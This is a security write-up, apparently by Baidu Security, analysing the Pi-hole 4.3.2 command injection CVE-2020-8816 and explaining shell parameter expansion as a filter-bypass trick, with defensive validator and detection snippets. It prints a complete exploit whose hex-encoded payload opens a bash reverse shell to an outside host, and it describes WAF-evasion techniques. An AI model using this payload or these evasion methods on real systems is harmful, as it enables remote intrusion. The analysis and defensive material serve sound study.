Talking about shell parameter expansion, starting from CVE-2020-8816

Time:2020-10-26

1. Preface

Recently I came across an article on the Pi-hole <= 4.3.2 remote code execution vulnerability (CVE-2020-8816). The root cause is not complicated, but the exploit it constructs caught my interest: because Pi-hole converts the injected parameter to uppercase, the exploit uses shell parameter expansion to get around that. After reading the relevant documentation, I found that this technique is very flexible and can be used in command injection attacks to bypass a traditional WAF.

2. Brief reproduction and analysis of CVE-2020-8816

We downloaded and installed Pi-hole 4.3.2. Once installation succeeds, you are prompted to visit http://pi.hole/admin in a browser. This is an authenticated command execution vulnerability: a random password is generated in the console during installation. After logging in, open Settings > DHCP and perform the command injection in the MAC address field shown in the figure below.


At this point we fill in the field, capture the request, and find that it is sent to /admin/settings.php. Looking at the logic of settings.php, the file is mainly used to render the content and layout of the settings page; it is a mixture of PHP and HTML and contains no save logic. However, line 9 of the file includes scripts/pi-hole/php/savesettings.php.


Following savesettings.php, we find that the value of the field POST parameter is dispatched through a switch/case. In the captured request the field is DHCP, which leads to line 548. The injection point addmac is assigned to $mac and is checked by the validMAC method on line 556.


We continue into the validMAC method and find that it returns success as long as 12 digits or letters are matched somewhere in the string. Because the regular expression has no start and end anchors, any other characters can be placed around them. $mac is then concatenated directly into the exec call on line 604, resulting in command injection.
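As an added example (not Pi-hole's code), the following POSIX sh functions contrast an unanchored check like the one described above with anchored variants; the hexadecimal character set of a MAC and the sample inputs are my assumptions, constructed for the demonstration.

```shell
# Added example, not Pi-hole's code: unanchored vs. anchored MAC checks.
# A MAC entered as 12 hex digits is the assumed input format; the bad
# samples are constructed.

# Mirrors the flaw: 12 digits/letters anywhere in the input are enough,
# so anything appended after them is accepted as well.
mac_ok_unanchored() {
    printf '%s' "$1" | grep -qE '[0-9A-Za-z]{12}'
}

# First fix: anchor the pattern so the whole input must be a MAC.
# Caveat: grep works line by line, so a value with an embedded newline
# still passes as long as its first line looks like a MAC.
mac_ok_anchored_grep() {
    printf '%s' "$1" | grep -qE '^[0-9A-Fa-f]{12}$'
}

# Stricter fix using only POSIX parameter expansion and pattern matching:
# exact length 12 and no character outside the hex set, newline included.
mac_ok_strict() {
    [ "${#1}" -eq 12 ] || return 1
    case "$1" in
        *[!0-9A-Fa-f]*) return 1 ;;
    esac
    return 0
}

# Constructed samples.
GOOD_MAC='aabbccddeeff'
BAD_MAC='123456789123&&id'                # trailing shell text
BAD_NL="$(printf 'aabbccddeeff\nid')"     # newline-separated text

# Report which checks accept a value when the file is run directly.
report() {
    for f in mac_ok_unanchored mac_ok_anchored_grep mac_ok_strict; do
        if "$f" "$1"; then echo "$f: accept"; else echo "$f: reject"; fi
    done
}
report "$GOOD_MAC"; report "$BAD_MAC"; report "$BAD_NL"
```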


However, on line 560 every character of $mac is converted to uppercase. Commands on Linux are case sensitive, so uppercase forms such as "Id" or "whoamI" cannot be executed. PHP function names, on the other hand, are not case sensitive. The author therefore uses shell parameter expansion to obtain the lowercase characters p, h and r through pattern matching.

Here we can cut them out of constants already present in the environment:

$PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin'

$W=${PATH##*:/}='snap/bin'

$Y=${W%%/???}='snap'

$P=${Y#???}='p'

$PWD='/var/www/html/admin'

$I=${PWD#/???/???/}='html/admin'

$H=${I%???/?????}='h'

$Q=${PWD%/???/????/?????}='/var'

$R=${Q#/??}='r'

The exploit can then be constructed as follows:

123456789123&&W=${PATH##\*:/}&&Y=${W%%/???}&&P=${Y#???}&&I=${PWD#/???/???/}&&H=${I%???/?????}&&Q=${PWD%/???/????/?????}&&R=${Q#/??}&&$P$H$P$IFS-$R$IFS’EXEC(HEX2BIN(“62617368202D63202762617368202D69203E26202F6465762F7463702F312E312E312E312F3930393020303E263127”));’&&


3. Introduction to shell parameter expansion

The bypass based on shell parameter expansion is very interesting and may be used to get past a WAF and similar filters when exploiting a command injection vulnerability. I also looked up the relevant documentation. Parameter expansion is defined as follows: in the shell, braces ${} can be used to wrap a parameter name so that characters immediately following it are not treated as part of the variable name. The most basic form of parameter expansion is therefore ${parameter}. The commonly useful operations are as follows:

Case conversion:

${parameter^pattern} // convert the first character matching pattern to uppercase

${parameter^^pattern} // convert all characters matching pattern to uppercase

${parameter,pattern} // convert the first character matching pattern to lowercase

${parameter,,pattern} // convert all characters matching pattern to lowercase


String deletion:

${parameter#pattern} // match pattern from the beginning and delete the shortest matching prefix

${parameter##pattern} // match pattern from the beginning and delete the longest matching prefix

${parameter%pattern} // match pattern from the end and delete the shortest matching suffix

${parameter%%pattern} // match pattern from the end and delete the longest matching suffix

A simple example is shown in the figure below: knowing the value of $PATH, you can apply pattern deletion several times, leaving only the characters you need, and then execute the id command.


Parameter slicing:

${parameter:offset:length} // extract length characters starting at index offset

Slicing is a more convenient way to extract characters.


Parameter substitution:

${parameter/pattern/string} // replace the part matching pattern with string

During command injection, sensitive words can be transformed through substitution to get past a filter.


The patterns used in these expansions usually consist of the following symbols:

* // match any string

? // match any single character

[...] // match any character in the set

In actual testing, the command execution functions of PHP, Java and other languages do not all fully support shell parameter expansion. In a PHP 7.0.3 environment, the system, exec and shell_exec methods only support the string deletion forms above, whereas in a Java 1.8 environment Runtime.getRuntime().exec supports all of the forms above.
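As an added example (not the author's or Baidu's code), a small POSIX sh filter that flags request values carrying the expansion operators listed above or a bare $IFS; the sample POST-body lines are constructed, and the assumption is that a MAC address field has no legitimate use for any of this syntax.

```shell
# Added example, not the author's code: flag values that use the
# parameter-expansion operators (#, ##, %, %%, ^, ^^, ",", ",,",
# :offset:length, /pattern/) or $IFS. A hit in a field such as a MAC
# address is a useful command-injection indicator for a WAF or log review.

# Returns 0 (flagged) if the value carries ${NAME<operator>...} or $IFS.
# The plain form ${NAME} is deliberately not matched here.
has_shell_expansion() {
    printf '%s' "$1" | grep -qE \
        '[$][{][A-Za-z_][A-Za-z0-9_]*(##?|%%?|\^\^?|,,?|:|/)|[$][{]?IFS'
}

# Constructed sample values as they might appear in captured POST bodies.
SAMPLES='mac=aabbccddeeff
mac=123456789123&&W=${PATH##*:/}&&P=${W%%/???}
mac=001122334455
mac=${HOME:1:3}
mac=$A$B$IFS-x
mac=${PATH}'

# Counts how many sample lines the filter flags (3 of the 6 above).
count_flagged() {
    n=0
    while IFS= read -r line; do
        if has_shell_expansion "$line"; then n=$((n + 1)); fi
    done <<EOF
$SAMPLES
EOF
    echo "$n"
}

echo "flagged: $(count_flagged) of 6 sample values"
```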

4. Security product solutions

Baidu's integrated security product already supports detection and interception of CVE-2020-8816, and its AI-based whitelist model learning can also effectively intercept the transformations produced by shell parameter expansion. Customers who need it can log in to anquan.baidu.com to contact us.

Reference links:

https://www.freebuf.com/vuls/…

https://www.gnu.org/software/…_node/Pattern-Matching.html#Pattern-Matching

https://www.gnu.org/software/…_node/Shell-Parameter-Expansion.html


This article is original content from Baidu Security; when reprinting, please indicate the source and the original link.
